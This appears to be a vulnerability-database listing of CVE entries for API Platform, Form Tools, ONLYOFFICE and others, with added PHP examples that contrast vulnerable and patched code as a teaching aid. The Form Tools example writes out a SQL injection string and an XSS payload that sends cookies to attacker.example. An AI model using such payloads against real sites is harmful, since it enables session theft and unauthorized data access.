
CVE-2025-23204 – GraphQl securityAfterResolver not called
https://notcve.org/view.php?id=CVE-2025-23204
24 Mar 2025 — API Platform Core is a system to create hypermedia-driven REST and GraphQL APIs. Starting in version 3.3.8, the security check that runs after GraphQL resolvers (`securityAfterResolver`) is never applied: a `switch` clause is missing a `break`, so the post-resolver check is always overwritten by the fallback `security` check. Because the code falls back to `security`, the issue only has an impact on operations that define `securityAfterResolver` without also defining `security`. Version 3.3.15 contains a patch for the issue. • https://github.com/api-platform/core/commit/dc4fc84ba93e22b4f44a37e90a93c6d079c1c620 • CWE-20: Improper Input Validation •
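The missing-`break` fallthrough described in this entry, as an added example that is not API Platform's own code: the `Operation` class, the `after_resolver` event name and the two `resolveCheck*` functions are hypothetical stand-ins for the real access-checker, and the security expressions are reduced to booleans so the block runs with plain `php`.

```php
<?php
// Added example, not API Platform's own code: models the missing-`break`
// fallthrough behind CVE-2025-23204. `Operation`, the event name and the
// resolveCheck* functions are hypothetical; access expressions are reduced
// to booleans (null = no check configured at that stage).

final class Operation
{
    public function __construct(
        public ?bool $security = null,
        public ?bool $securityAfterResolver = null,
    ) {}
}

// Vulnerable shape: `after_resolver` selects the post-resolver expression,
// but without a `break` execution continues into `default`, which overwrites
// $isGranted with the operation-wide `security` expression.
function resolveCheckVulnerable(Operation $op, string $event): ?bool
{
    switch ($event) {
        case 'after_resolver':
            $isGranted = $op->securityAfterResolver;
            // no break here: falls through into default
        default:
            $isGranted = $op->security;
    }
    return $isGranted;
}

// Fixed shape: each clause terminates, so the selected expression survives.
function resolveCheckFixed(Operation $op, string $event): ?bool
{
    switch ($event) {
        case 'after_resolver':
            $isGranted = $op->securityAfterResolver;
            break;
        default:
            $isGranted = $op->security;
    }
    return $isGranted;
}

// A stage with no configured expression has nothing to enforce.
function isGranted(?bool $expression): bool
{
    return $expression ?? true;
}

// Case 1: only `securityAfterResolver` is set, and it denies.
// Case 2: both expressions deny.
$cases = [
    'afterResolver only' => new Operation(security: null,  securityAfterResolver: false),
    'both set'           => new Operation(security: false, securityAfterResolver: false),
];

foreach ($cases as $label => $op) {
    printf(
        "%-19s vulnerable grants=%s fixed grants=%s\n",
        $label,
        var_export(isGranted(resolveCheckVulnerable($op, 'after_resolver')), true),
        var_export(isGranted(resolveCheckFixed($op, 'after_resolver')), true),
    );
}
```

In the first case the vulnerable resolver ends up with the `security` expression, which is unset, so the request is granted even though `securityAfterResolver` denies it; the fixed resolver denies. In the second case both variants deny, which is why the advisory limits the impact to operations that configure `securityAfterResolver` and no `security`.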

CVE-2023-5192 – Excessive Data Query Operations in a Large Data Table in pimcore/demo
https://notcve.org/view.php?id=CVE-2023-5192
26 Sep 2023 — Excessive Data Query Operations in a Large Data Table in GitHub repository pimcore/demo prior to 10.3.0. • https://github.com/pimcore/demo/commit/a2a7ff3b565882aefb759804aac4a51afb458f1f • CWE-1049: Excessive Data Query Operations in a Large Data Table •

CVE-2023-25575 – Secured properties in API Platform Core may be accessible within collections
https://notcve.org/view.php?id=CVE-2023-25575
28 Feb 2023 — API Platform Core is the server component of API Platform: hypermedia and GraphQL APIs. Resource properties secured with the `security` option of the `ApiPlatform\Metadata\ApiProperty` attribute can be disclosed to unauthorized users. The problem affects most serialization formats, including raw JSON, which is enabled by default when installing API Platform. Custom serialization formats may also be impacted. Only collection endpoints are affected by the issue; item endpoints are not. • https://github.com/api-platform/core/commit/5723d68369722feefeb11e42528d9580db5dd0fb • CWE-842: Placement of User into Incorrect Group CWE-863: Incorrect Authorization •

CVE-2022-29777
https://notcve.org/view.php?id=CVE-2022-29777
01 Jun 2022 — Onlyoffice Document Server v6.0.0 and below and Core 6.1.0.26 and below were discovered to contain a heap overflow via the component DesktopEditor/fontengine/fontconverter/FontFileBase.h. • https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#601 • CWE-787: Out-of-bounds Write •

CVE-2022-29776
https://notcve.org/view.php?id=CVE-2022-29776
01 Jun 2022 — Onlyoffice Document Server v6.0.0 and below and Core 6.1.0.26 and below were discovered to contain a stack overflow via the component DesktopEditor/common/File.cpp. • https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#601 • CWE-787: Out-of-bounds Write •

CVE-2021-38144
https://notcve.org/view.php?id=CVE-2021-38144
31 Aug 2021 — An issue was discovered in Form Tools through 3.0.20. A low-privileged user can trigger reflected XSS when viewing a form via the submission_id parameter, e.g., clients/forms/edit_submission.php?form_id=1&view_id=1&submission_id=[XSS]. • https://bernardofsr.github.io/blog/2021/form-tools • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVE-2021-38143
https://notcve.org/view.php?id=CVE-2021-38143
31 Aug 2021 — An issue was discovered in Form Tools through 3.0.20. When an administrator creates a customer account, the customer can log in and change their first and last name. These fields accept XSS payloads that are stored and then triggered in the admin panel when the admin views the client list. This stored XSS can lead to extraction of the admin's PHPSESSID cookie. • https://bernardofsr.github.io/blog/2021/form-tools • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVE-2021-38145
https://notcve.org/view.php?id=CVE-2021-38145
31 Aug 2021 — An issue was discovered in Form Tools through 3.0.20. SQL injection can occur via the export_group_id field when a low-privileged user (client) tries to export a form with data, e.g., by manipulating modules/export_manager/export.php?export_group_id=1&export_group_1_results=all&export_type_id=1. • https://bernardofsr.github.io/blog/2021/form-tools • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
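The three Form Tools entries above (CVE-2021-38144, CVE-2021-38143 and CVE-2021-38145) share two bug classes: request or stored values echoed into HTML unescaped, and a request parameter interpolated into SQL. As an added example that is not Form Tools code, here is each class as a vulnerable pattern beside a hardened one. The `export_groups` table, its columns, the `client` owner filter and the render functions are hypothetical, the attacker inputs are constructed, and the block needs PHP with the pdo_sqlite extension.

```php
<?php
// Added example, not Form Tools code. The schema, column names, owner filter
// and render functions are hypothetical; the attacker inputs are constructed
// to resemble the parameters named in the advisories.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE export_groups (export_group_id INTEGER PRIMARY KEY, group_name TEXT, owner TEXT)');
$db->exec("INSERT INTO export_groups VALUES (1, 'Public CSV', 'client'), (2, 'Admin audit', 'admin')");

// --- SQL injection (CWE-89), cf. export_group_id ---

// Vulnerable: the request value is interpolated into the query text, so a
// value such as `1 OR 1=1 --` rewrites the WHERE clause and comments out the
// owner restriction that was meant to scope the export to the client.
function exportGroupVulnerable(PDO $db, string $exportGroupId): array
{
    $sql = "SELECT group_name FROM export_groups WHERE export_group_id = $exportGroupId AND owner = 'client'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: reject anything that is not an integer, then bind the value as a
// parameter so it can never be parsed as SQL.
function exportGroupHardened(PDO $db, string $exportGroupId): array
{
    if (!ctype_digit($exportGroupId)) {
        throw new InvalidArgumentException('export_group_id must be a positive integer');
    }
    $stmt = $db->prepare('SELECT group_name FROM export_groups WHERE export_group_id = :id AND owner = :owner');
    $stmt->execute([':id' => (int) $exportGroupId, ':owner' => 'client']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// --- Cross-site scripting (CWE-79), cf. submission_id and the client name ---

// Vulnerable: a URL parameter (reflected) and a stored profile field are
// written into the page unchanged, so a script in either runs in the viewer's
// session, e.g. the admin's when the client list is rendered.
function renderVulnerable(string $submissionId, string $clientName): string
{
    return "<h1>Submission $submissionId</h1><td>$clientName</td>";
}

// Hardened: escape for the HTML context at the point of output. Storing the
// name unescaped is fine; what matters is that every sink escapes.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderHardened(string $submissionId, string $clientName): string
{
    return '<h1>Submission ' . e($submissionId) . '</h1><td>' . e($clientName) . '</td>';
}

// Constructed attacker inputs (not taken from the advisories).
$sqliPayload = '1 OR 1=1 --';
$xssPayload  = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

echo "vulnerable export:\n";
print_r(exportGroupVulnerable($db, $sqliPayload));

echo "hardened export with payload:\n";
try {
    exportGroupHardened($db, $sqliPayload);
} catch (InvalidArgumentException $ex) {
    echo '  rejected: ', $ex->getMessage(), "\n";
}

echo "hardened export with a valid id:\n";
print_r(exportGroupHardened($db, '1'));

echo "vulnerable render:\n", renderVulnerable($xssPayload, $xssPayload), "\n";
echo "hardened render:\n", renderHardened($xssPayload, $xssPayload), "\n";
```

Run it with `php`. The interpolated query returns rows for both owners because the `--` comments out the owner filter; the prepared statement refuses the payload at validation time and, with a valid id, returns only the client's row. The hardened renderer turns the `<script>` tag into `&lt;script&gt;...`, so the browser shows it as text instead of executing it. Casting after `ctype_digit` is belt and braces; the binding alone already prevents injection, the validation just gives a clear error for malformed input.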

CVE-2020-15235 – Sensitive data exposure in RACTF
https://notcve.org/view.php?id=CVE-2020-15235
05 Oct 2020 — In RACTF before commit f3dc89b, unauthenticated users are able to get the value of sensitive config keys that would normally be hidden from everyone except admins. All versions after commit f3dc89b9f6ab1544a289b3efc06699b13d63e0bd (3/10/20) are patched. • https://github.com/ractf/core/commit/f3dc89b9f6ab1544a289b3efc06699b13d63e0bd • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor •

CVE-2020-15505 – Ivanti MobileIron Multiple Products Remote Code Execution Vulnerability
https://notcve.org/view.php?id=CVE-2020-15505
07 Jul 2020 — A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier allows remote attackers to execute arbitrary code via unspecified vectors. • https://packetstorm.news/files/id/161097 • CWE-706: Use of Incorrectly-Resolved Name or Reference •